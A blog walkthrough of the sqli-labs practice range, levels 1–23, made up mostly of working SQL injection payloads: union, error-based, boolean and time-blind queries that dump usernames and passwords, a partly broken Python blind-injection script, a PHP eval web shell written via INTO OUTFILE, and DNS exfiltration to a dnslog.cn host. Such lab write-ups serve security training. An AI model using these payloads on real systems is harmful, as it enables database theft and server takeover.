Sqli labs pass strategy

Keywords: Database

less 1 -- single quote character injection

Character injection, single quotation mark

Followed by the website


Normal display, then

Judge injection point

?id=1' and 1=1--+

Replace 1 = 1 with 1 = 2. No error is reported, but no information is displayed, indicating that character injection can be used


Number of judgment columns

Use order by to gradually increase from 1 and stop when an error is reported.

?id=1' order by 1--+

Therefore, we can confirm that the number of columns is 3 (4 reports an error)


Judge the data display position

After we enter the address

?id=0' union select 1,2,3--+

Then you can

Insert some SQL statements to query more information

Find the name of the database currently in use' union select 1,2,database()--+

Query all library names' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

Query all table names' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

Find information about the security database' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

View the column names in the user table' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='user'--+

View the value of the username column in the user table' union select 1,2,group_concat(username) from security.users--+

View the value of the password column in the user table' union select 1,2,group_concat(password) from security.users--+

less 2 - integer injection

Let's go first

Judge injection point

?id=1 and 1=1--+

Replace 1 = 1 with 1 = 2, no information is displayed and no error is reported.


Number of judgment columns

Address followed by

?id=1 order by 1--+

Judge the data display position

It is roughly the same as less1

Judge the data display position

It is roughly the same as less1

Insert SQL statement query more information

It is roughly the same as less1

less 3 -- single quote deformed character injection

Let's take a look at the source code of the level

This requires us to close the parentheses when injecting

Judge injection point

?id=1') and 1=1 --+

Remember when querying other information
Add ') after the id, and then add the corresponding query statement

The steps are the same as above

less 4 -- double quote character injection

Judge injection point

Replace the ') followed by the value of id with“" and 1=2--+

Other unchanged

less 5 -- double quote character injection

Let's try first

Judge injection point' and 1=1--+

Discovery display

The error message is displayed. Check the source code and confirm~

No problem, that is, if the query statement executes correctly, we will see

If there is an execution error, an error message is displayed

Here is a python script used to explode the length and specific name of the database name. The test url is the fifth level of the shooting range, which is the principle of Boolean blind injection

import requests

def database_len():
    global aa
    for i in range(1, 10):
        url = ''''''
        payload = '''?id=1' and length(database())>%s''' % i
        # print(url+payload+'%23')
        r = requests.get(url + payload + '%23')
        if 'You are in' in r.text:
            # print('false')
            print('database_length:', i)
            aa = i
def database_name():
    global aa
    name = ''
    for j in range(1, aa+1):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = "' and substr(database(),%d,1)='%s'" % (j, i)
            # print(url+'%23')
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i


    print('database_name:', name)
if __name__ == "__main__":
    aa = 0

Because the injection point has error information, you can also use error injection

url followed by:

?id=-1'and(select updatexml(1,concat(0x7E,(select database()),0x7E),1)) --+

The database name can be revealed

In addition, time blind note can also be used for this problem

A statement used to determine the length of a database name

http://localhost/sqli-labs-master/Less-5/?id=1' and if(length(database())=8,sleep(5),sleep(1))--+

less 6 -- double quote character injection

The name is similar to the fifth level. Replace the single quotation marks of the fifth level with double quotation marks." and 1=1--+

less 7 -- export file character injection

Judge injection point


Number of judgment columns

After url, when the number after order by is equal to 4, an error is reported, so the number of columns is 3

?id=1')) order by 4--+

Then we can upload the shell by reading and writing the file

http://localhost/sqli-labs-master/Less-7/?id=1')) union select 1,'<?php eval($_REQUEST[a]); ?>',3 into outfile 'D://1.php'--+

It can be connected with ant sword or kitchen knife

less 8 -- Boolean single quote blind annotation

Judge injection point

http://localhost/sqli-labs-master/Less-8/?id=1' and 1=1--+

When judging the number of columns, enter 4 and the error will not be echoed

http://localhost/sqli-labs-master/Less-8/?id=1' order by 4--+

Therefore, error injection is not applicable. Boolean injection and time injection can be used. See less5 for details
At the same time, the problem can also be injected with dns echo (this method can be used when the target has no display bit and no error echo)

dns echo injection

We use this website


The URL generated after clicking get


So we can construct a payload

http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",(database()),".2asf57f.dnslog.cn\\1.txt")) --+

less 9 -- time based single quote blind annotation

Judge injection point

http://localhost/sqli-labs-master/Less-9/?id=1' and 1=1 --+

After the test, it is found that the Error statement page remains unchanged. You can use time blind note, and of course, you can also use DNS echo

less 10 -- time based double quotation mark blind annotation

Replace single quotation marks with double quotation marks
Time blind injection and DNS echo can be used

less 11 -- POST single quote character injection

Judge injection point

First, we try to enter the user name as admin '#, and enter the password casually

Then you can also at Usename

Number of judgment columns

admin' order by 3 #

Judge the position of data display

We type in Usename

as' union select 1,2#

It is found that an error will be reported when selecting 3, so the data display is the first column and the second column

Insert SQL query statement

Similar to less1, it is inserted in Usename

Of course, error injection can also be used at this time

Enter in Usename and fill in password casually

sa' and updatexml(1,concat(0x5e,(select group_concat(username,0x7e,password) from users),0x5e),1)#

less 12 -- injection of POST character deformation with double quotation marks

Similar to less11, the difference is that the closed symbol is somewhat different
It can be changed to this form in Usename


less 13 -- POST single quote deformed double injection

Interface after test

No echo. We can try error injection

admin') and extractvalue(1,concat(0x7e,(select database()))) #

Time blind injection can then be used

less 14 -- POST single quote deformed double injection

The interface is the same as the previous level. We try to use error injection

admin" and extractvalue(1,concat(0x7e,(select database())))#

less 15 - based on bool type / time delay single quote POST type blind note

Single quotation mark closed directly

ads' or 1=1#

Insert a time blind statement in Usename to simply judge the length of the database

ads' and if(length(database())=8,sleep(5),sleep(1))#

It can be seen that the time is greater than 5 seconds, and the time blind injection is feasible

less 16 - Double Quote POST blind note based on bool type / time delay

Similar to the previous level, you only need to change single quotation marks into double quotation marks.

ads" or 1=1#

less 17 - error based update query POST injection

Let's look at the source code again

You can know that the uname parameter will be wrapped by a function check_input()
We try to find function specific statements

You can see that get_magic_quotes_gpc() is used for filtering.
However, this is all for Usename, and there are no restrictions on password. Then we can inject error in password

We enter admin in Usename

Enter in password:

admin' and updatexml(1,concat(0x7e,version(),0x7e),1) --+

less 18 - error based user agent, header POST injection

Let's enter the correct account and password directly

You can see that the User Agent echo appears, so we can capture the package, then modify the User Agent and insert SQL statements into it

'and updatexml(1,concat(0x7e, database(),0x7e),1) and '1'='1

less 19 - Referer POST error injection

As usual, we test the echo position with the correct account

It is found that a Referer appears. We try to capture the package and modify the Referer. The statement is the same as the previous level, but the modified position is different.

'and updatexml(1,concat(0x7e, database(),0x7e),1) and '1'='1

less 20 - cookie header POST injection

After we input the correct account, there are many echoes. Let's grab the login package and have a look

Let's try to delete the last line and then add a cookie

' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

Successful error echo

less 21 - complex character Cookie injection

Similarly, we first enter the correct account information and log in to view the echo

It is found that the value of uname becomes a combination of upper and lower case English and numbers, which is obviously encoded
Here is base64 encoding

Let's try capturing the package, and then repeat the previous operation to add cookie s

' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

We encode this statement in base64, and then click Go

less 22 -- double quote character Cookie injection

This level is similar to the first two levels. During injection, just replace single quotation marks with double quotation marks

" and updatexml(1,concat(0x7e,database(),0x7e),1) and "1"="1

less 23 - GET type for filtering comments based on errors

Let's look at the source code

It is found that the annotation character is replaced in this customs. In the SQL statement, we can see that this is a single quotation mark character injection.
We construct SQL statements

?id=1'union select 1,2,3 and '1'='1

Then we try to explode the library

?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata where 1 and '1'='1

less 24 - secondary injection

Posted by JustinB on Wed, 13 Oct 2021 08:27:54 -0700